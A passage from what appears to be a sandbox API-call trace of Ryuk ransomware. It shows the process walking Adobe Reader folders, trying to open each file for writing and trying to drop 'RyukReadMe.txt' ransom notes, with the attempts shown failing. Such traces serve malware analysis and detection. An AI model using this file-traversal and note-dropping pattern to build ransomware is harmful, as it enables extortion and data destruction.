VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.243] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm", dwFileAttributes=0x80) returned 0 [0138.244] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeiaMe.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leiame.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.244] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.244] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.244] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.244] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.244] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm", dwFileAttributes=0x80) returned 0 [0138.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Liesmich.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\liesmich.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.245] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.245] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.245] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.245] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.245] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm", dwFileAttributes=0x80) returned 0 [0138.246] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Lisezmoi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lisezmoi.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.246] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.246] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.246] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.246] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm", dwFileAttributes=0x80) returned 0 [0138.246] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Llegiu-me.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\llegiu-me.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.246] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.246] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.247] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.247] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm", dwFileAttributes=0x80) returned 0 [0138.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LueMinut.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\lueminut.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.247] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.247] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.247] SetLastError (dwErrCode=0x0) [0138.247] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.247] GetLastError () returned 0x5 [0138.247] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.247] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.247] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.248] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.248] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest", dwFileAttributes=0x80) returned 0 [0138.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobe.reader.dependencies.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.249] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.249] SetLastError (dwErrCode=0x0) [0138.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.249] GetLastError () returned 0x5 [0138.249] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.249] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.249] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.252] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.252] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.252] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT", dwFileAttributes=0x80) returned 0 [0138.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.252] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.252] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.253] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.253] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.253] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CHS", dwFileAttributes=0x80) returned 0 [0138.253] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.253] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.254] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.254] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.254] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CHT", dwFileAttributes=0x80) returned 0 [0138.254] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.254] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.254] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.254] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.254] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.254] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CZE", dwFileAttributes=0x80) returned 0 [0138.255] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.255] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.255] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.255] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.255] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.255] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.DAN", dwFileAttributes=0x80) returned 0 [0138.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.256] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.256] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.256] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.256] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.256] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.DEU", dwFileAttributes=0x80) returned 0 [0138.257] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.257] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.257] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.257] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.257] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.257] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.257] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ESP", dwFileAttributes=0x80) returned 0 [0138.258] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.258] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.258] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.EUQ", dwFileAttributes=0x80) returned 0 [0138.258] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.258] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.258] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.258] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.258] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.259] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.FRA", dwFileAttributes=0x80) returned 0 [0138.259] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.fra"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.259] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.259] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.259] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.259] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.259] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.HRV", dwFileAttributes=0x80) returned 0 [0138.259] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.259] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.259] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.260] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.260] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.HUN", dwFileAttributes=0x80) returned 0 [0138.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.260] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.260] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.260] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.260] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.260] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ITA", dwFileAttributes=0x80) returned 0 [0138.260] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.261] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.261] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.261] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.261] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.JPN", dwFileAttributes=0x80) returned 0 [0138.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.261] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.261] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.261] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.262] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.KOR", dwFileAttributes=0x80) returned 0 [0138.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.262] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.262] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.262] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.262] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.262] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NLD", dwFileAttributes=0x80) returned 0 [0138.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.262] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.262] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.262] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.263] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.263] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NOR", dwFileAttributes=0x80) returned 0 [0138.263] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.263] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.263] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.263] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.263] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.263] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.POL", dwFileAttributes=0x80) returned 0 [0138.264] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.264] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.264] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.264] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.264] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.264] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.PTB", dwFileAttributes=0x80) returned 0 [0138.264] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.265] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.265] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.265] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.265] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.RUM", dwFileAttributes=0x80) returned 0 [0138.265] CreateFileW 